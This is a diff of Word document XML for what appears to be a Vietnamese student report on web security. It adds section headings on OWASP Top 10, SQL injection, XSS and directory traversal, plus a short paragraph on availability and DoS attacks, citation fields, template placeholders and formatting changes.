+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[5], [6]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.   </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:firstLine="504"/>
         <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc207867335"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Availability (Tính sẵn sàng):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Mục tiêu cuối cùng của tính sẵn sàng là đảm bảo rằng các hệ thống, ứng dụng và dữ liệu luôn có thể truy cập được cho người dùng được ủy quyền vào bất cứ lúc nào họ cần</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"nBD5iO8W","properties":{"formattedCitation":"[2]","plainCitation":"[2]","noteIndex":0},"citationItems":[{"id":32,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/J6TCX34C"],"itemData":{"id":32,"type":"webpage","title":"An toàn thông tin là gì? 4 Nội dung cần biết","URL":"https://vnce.vn/an-toan-thong-tin-la-gi","accessed":{"date-parts":[["2025",9,9]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>. Các cuộc tấn công từ chối dịch vụ (DoS) và từ chối dịch vụ phân tán (DDoS) trực tiếp nhắm vào mục tiêu này. Bằng cách làm quá tải hệ thống với một lượng lớn lưu lượng truy cập, chúng khiến dịch vụ không thể phản hồi và gây gián đoạn nghiêm trọng cho người dùng hợp pháp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"XQYdNX9b","properties":{"formattedCitation":"[7]","plainCitation":"[7]","noteIndex":0},"citationItems":[{"id":40,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/VBUVAYZF"],"itemData":{"id":40,"type":"webpage","abstract":"Tấn công DDoS là hành vi gửi lượng truy cập giả mạo lớn khiến website quá tải, ngừng hoạt động, ảnh hưởng nghiêm trọng đến doanh nghiệp.","container-title":"DDoS là gì và cách ngăn chặn các loại tấn công DDoS Server","language":"vi-VN","title":"DDoS là gì và cách ngăn chặn các loại tấn công DDoS Server","URL":"https://www.vnetwork.vn/news/ddos-la-gi-va-cach-ngan-chan-cac-loai-tan-cong-ddos-server/","author":[{"family":"Dang","given":"Tony"}],"accessed":{"date-parts":[["2025",9,9]]},"issued":{"date-parts":[["2025",7,30]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[7]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="5" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:firstLine="504"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t xml:space="preserve">Bảng </w:t>
       </w:r>
@@ -3489,6 +6572,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:fldChar w:fldCharType="begin"/>
       </w:r>
@@ -3497,6 +6581,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:instrText xml:space="preserve"> SEQ Bảng \* ARABIC </w:instrText>
       </w:r>
@@ -3505,6 +6590,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
@@ -3514,6 +6600,7 @@
           <w:noProof/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>1</w:t>
       </w:r>
@@ -3522,6 +6609,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
@@ -3530,6 +6618,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>: Tiêu đề (Caption) của bảng n</w:t>
       </w:r>
@@ -3538,6 +6627,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>ằ</w:t>
       </w:r>
@@ -3546,15 +6636,17 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>m ở phía trên của bảng</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="1"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
+      <w:bookmarkEnd w:id="4"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
@@ -3590,6 +6682,7 @@
                 <w:bCs/>
                 <w:sz w:val="26"/>
                 <w:szCs w:val="26"/>
+                <w:highlight w:val="yellow"/>
               </w:rPr>
             </w:pPr>
             <w:r>
@@ -3599,6 +6692,7 @@
                 <w:bCs/>
                 <w:sz w:val="26"/>
                 <w:szCs w:val="26"/>
+                <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>STT</w:t>
             </w:r>
@@ -3621,6 +6715,7 @@
                 <w:bCs/>
                 <w:sz w:val="26"/>
                 <w:szCs w:val="26"/>
+                <w:highlight w:val="yellow"/>
               </w:rPr>
             </w:pPr>
             <w:r>
@@ -3630,6 +6725,7 @@
                 <w:bCs/>
                 <w:sz w:val="26"/>
                 <w:szCs w:val="26"/>
+                <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>MSSV</w:t>
             </w:r>
@@ -3652,6 +6748,7 @@
                 <w:bCs/>
                 <w:sz w:val="26"/>
                 <w:szCs w:val="26"/>
+                <w:highlight w:val="yellow"/>
               </w:rPr>
             </w:pPr>
             <w:r>
@@ -3661,6 +6758,7 @@
                 <w:bCs/>
                 <w:sz w:val="26"/>
                 <w:szCs w:val="26"/>
+                <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>Họ và tên</w:t>
             </w:r>
@@ -3692,6 +6790,7 @@
                 <w:bCs/>
                 <w:sz w:val="26"/>
                 <w:szCs w:val="26"/>
+                <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>Lớp</w:t>
             </w:r>
@@ -3875,6 +6974,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc208343439"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3885,8 +6985,10 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Phân loại đối tượng tấn công</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3931,6 +7033,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:bookmarkStart w:id="7" w:name="_Toc208343440"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3941,6 +7044,7 @@
         </w:rPr>
         <w:t>Vòng đời tấn công mạng (Cyber Kill Chain)</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3969,8 +7073,20 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Tổng quan về các lỗ ổng bảo mật Web phổ biến</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="8" w:name="_Toc208343441"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tổng quan về các lỗ ổng bảo mật Web phổ biến</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3991,6 +7107,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc208343442"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4001,6 +7118,7 @@
         </w:rPr>
         <w:t>Giới thiệu về OWASP Top 10</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4021,6 +7139,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc208343443"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4031,6 +7150,7 @@
         </w:rPr>
         <w:t>Phân tích các lỗ hổng chính trong OWASP Top 10-2021</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4051,6 +7171,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc208343444"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4061,6 +7182,7 @@
         </w:rPr>
         <w:t>CÁC KỸ THUẬT TẤN CÔNG WEB SERVER</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4081,7 +7203,6 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc207351926"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4092,6 +7213,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:bookmarkStart w:id="12" w:name="_Toc208343445"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4102,7 +7224,6 @@
         </w:rPr>
         <w:t>T</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4153,6 +7274,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> SQL Injection (SQLi)</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4175,6 +7297,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc208343446"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4187,6 +7310,7 @@
         </w:rPr>
         <w:t>Cơ chế hoạt động</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4209,6 +7333,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc208343447"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4221,6 +7346,7 @@
         </w:rPr>
         <w:t>Các dạng tấn công phổ biến</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4243,6 +7369,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc208343448"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4267,6 +7394,7 @@
         </w:rPr>
         <w:t>à ví dụ thực tế</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4288,6 +7416,954 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
           <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Nội dung của tiểu mục cấp 3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Tiểu mục cấp 4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="1728"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Nội dung của tiểu mục cấp 4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>(để copy)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="16" w:name="_Toc208343449"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tấn công Cross-Site Scripting (XSS)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="16"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="17" w:name="_Toc208343450"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Cơ chế hoạt động</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="17"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Toc208343451"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Các dạng tấn công và dặc điểm</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="18"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="19" w:name="_Toc208343452"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Hậu quả</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="19"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="20" w:name="_Toc208343453"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tấn công Directory Traversal và File Inclusion</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="20"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
